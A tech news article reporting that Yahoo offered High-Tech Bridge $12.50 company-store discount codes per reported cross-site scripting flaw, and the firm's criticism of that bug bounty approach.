Yahoo slammed over $12.50 security flaw rewards

Security researchers claim paltry bounty will not encourage others to share their findings.

Yahoo

Yahoo has been criticised for allegedly rewarding security researchers who uncover flaws in its products with discounts on branded good sold through its company store.

IT security services provider High-Tech Bridge claims to have been offered a $12.50 discount code for each security flaw it uncovered, which was only redeemable in the Yahoo Company Store.

The organisation said it was offered the reward by Yahoo after discovering several Cross-Site Scripting XSS vulnerabilities.

Each one would have reportedly allowed any @yahoo.com email address to be compromised by getting the owner of it to click on a specially created link when logged into the site.

The company's research team said it notified Yahoo of the flaws on Monday 23 September, but claims only two of them were acknowledged within 48 hours of the report being made.

"Yahoo warmly thanked us for reporting the vulnerabilities and offered us...12.50 USD reward per one vulnerability," the company said in a statement.

"Moreover, this sum was given as a discount code that can only be used in the Yahoo Company Store, which sell Yahoo's corporate T-shirts, cups, pens and accessories."

All of the vulnerabilities exposed by High-Tech Bridge, including another it reported that Yahoo claimed had already been discovered, have now been patched.

Ilia Kolochenko, High-Tech Bridge CEO, has called on Yahoo to rethink its rewards scheme, because it offers little incentive to report bugs.

"Paying several dollars per vulnerability is a bad job and won't motivate people to report security vulnerabilities to them, especially when such vulnerabilities can be easily sold on the black market for a much higher price" he said.

"If Yahoo cannot afford to spend money on its corporate security, it should at least try to attract security researchers by other means. Otherwise none of Yahoo's customers are safe."

IT Pro approached Yahoo for comment on this story, but was still awaiting a response at the time of publication.

This is the second time in less than a week that Yahoo's attitude to security has come under scrutiny.

The company's decision to reuse inactive email addresses has led to complaints by some users that they've received personal emails intended for the previous owner.

Featured Resources

Seven steps to connect and empower your frontline workers

How business leaders can improve communication with a secure platform

Free download

Create what’s next

The future of collaboration and productivity

Free Download

Leveraging the cloud without relinquishing control

Your data. Their cloud.

Free download

Re-architecting for nonstop innovation

Unlocking productivity, scalability, and lower costs for cloud natives

Free Download

Recommended

The worst hacks of all time
hacking

The worst hacks of all time

30 Sep 2021
Verizon loses billions in Yahoo and AOL sale
Acquisition

Verizon loses billions in Yahoo and AOL sale

3 May 2021

Most Popular

What should you really be asking about your remote access software?
Sponsored

What should you really be asking about your remote access software?

17 Nov 2021
How to speed up Microsoft's Windows 11
Microsoft Windows

How to speed up Microsoft's Windows 11

9 Nov 2021
Nike to take customers into the metaverse with 'NIKELAND'
virtualisation

Nike to take customers into the metaverse with 'NIKELAND'

19 Nov 2021